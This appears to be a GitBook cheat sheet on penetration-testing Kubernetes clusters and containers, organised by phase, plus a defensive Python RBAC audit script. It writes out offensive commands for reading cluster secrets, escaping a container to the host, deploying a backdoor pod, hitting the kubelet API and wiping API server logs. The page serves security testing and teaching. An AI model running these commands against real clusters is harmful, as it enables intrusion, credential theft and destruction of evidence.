Powered by GitBook

Container Testing Methodology

Kubernetes/Container Penetration Testing Methodology

1. Reconnaissance

  • Gather information about the target environment

  • Identify exposed services and endpoints

Commands:

# Scan for open ports
nmap -sV -p- <target_ip>

# Identify Kubernetes API server
curl -k https://<api_server_ip>:6443/version

# Enumerate subdomains
subfinder -d <domain>

2. Initial Access

  • Exploit exposed services

  • Gain a foothold in the cluster

Commands:

# Test for unauthenticated access to API server
kubectl --insecure-skip-tls-verify -s https://<api_server_ip>:6443 get pods

# Exploit known vulnerabilities (e.g., CVE-2018-1002105)
./cve-2018-1002105.sh https://<api_server_ip>:6443

3. Privilege Escalation

  • Escalate privileges within the cluster

  • Move laterally between pods/nodes

Commands:

# List service accounts and their permissions
kubectl get serviceaccounts
kubectl get clusterrolebindings

# Exploit overly permissive RBAC rules
kubectl --as=system:serviceaccount:default:default get secrets

# Escape container to host
docker run -v /:/host -it ubuntu chroot /host
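
A defender-side check for the RBAC step above, added here as an example and not part of the original cheat sheet: it parses the JSON that `kubectl get clusterroles,clusterrolebindings -o json` produces and flags bindings that hand a service account a wildcard role or access to secrets, the same over-permissive bindings the `--as=system:serviceaccount:...` test probes. The sample JSON and the SENSITIVE resource list are constructed assumptions, not cluster output.

```python
import json

# Constructed sample shaped like `kubectl get clusterroles,clusterrolebindings -o json` (not from a real cluster).
SAMPLE = json.loads("""{"items": [
 {"kind": "ClusterRole", "metadata": {"name": "cluster-admin"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "secret-reader"}, "rules": [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "pod-viewer"}, "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "default-is-admin"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "default"}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "ci-reads-secrets"},
  "roleRef": {"kind": "ClusterRole", "name": "secret-reader"},
  "subjects": [{"kind": "ServiceAccount", "name": "ci", "namespace": "build"}]},
 {"kind": "ClusterRoleBinding", "metadata": {"name": "app-views-pods"},
  "roleRef": {"kind": "ClusterRole", "name": "pod-viewer"},
  "subjects": [{"kind": "ServiceAccount", "name": "app", "namespace": "prod"}]}
]}""")

# Resources that let a workload read credentials or grant itself more rights (assumed list).
SENSITIVE = {"secrets", "pods/exec", "clusterrolebindings", "rolebindings"}

def risky_rules(role):
    """Reasons a ClusterRole is risky: wildcards, or any verb on a sensitive resource."""
    reasons = []
    for rule in role.get("rules", []):
        res, verbs = set(rule.get("resources", [])), set(rule.get("verbs", []))
        if "*" in res or "*" in verbs:
            reasons.append("wildcard resources/verbs")
        elif res & SENSITIVE:
            reasons.append("access to " + ",".join(sorted(res & SENSITIVE)))
    return reasons

def audit_rbac(dump):
    """Flag ClusterRoleBindings that hand a risky ClusterRole to a ServiceAccount."""
    roles = {i["metadata"]["name"]: i for i in dump["items"] if i["kind"] == "ClusterRole"}
    findings = []
    for b in (i for i in dump["items"] if i["kind"] == "ClusterRoleBinding"):
        role_name = b["roleRef"]["name"]
        reasons = risky_rules(roles.get(role_name, {}))
        for s in b.get("subjects", []):
            if reasons and s["kind"] == "ServiceAccount":
                # Same identity string that `kubectl --as=` expects for a service account.
                sa = f"system:serviceaccount:{s['namespace']}:{s['name']}"
                findings.append((b["metadata"]["name"], sa, role_name, reasons))
    return findings

if __name__ == "__main__":
    for binding, sa, role, why in audit_rbac(SAMPLE):
        print(f"{binding}: {sa} -> {role} ({'; '.join(why)})")
```

Each finding names the binding, the service account identity and the role, so it can go straight into the report's RBAC section with the remediation of narrowing the role or the subject.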

4. Post-Exploitation

  • Access sensitive data

  • Maintain persistence

  • Pivot to other parts of the infrastructure

Commands:

# Access secrets
kubectl get secrets -o yaml

# Create backdoor pod
kubectl apply -f malicious-pod.yaml

# Exploit kubelet API for node access
curl -k https://<node_ip>:10250/pods

5. Covering Tracks

  • Remove evidence of intrusion

  • Clean up temporary files and logs

Commands:

# Delete pods
kubectl delete pod <compromised_pod>

# Clear logs
echo > /var/log/kubernetes/kube-apiserver.log

6. Reporting

  • Document findings

  • Provide remediation recommendations

Key Areas to Address:

  • Misconfigurations

  • Vulnerabilities in images or components

  • Overly permissive RBAC rules

  • Insecure network policies

  • Lack of encryption or proper authentication

Remember to always get proper authorization before performing any penetration testing activities.


Last updated 11 months ago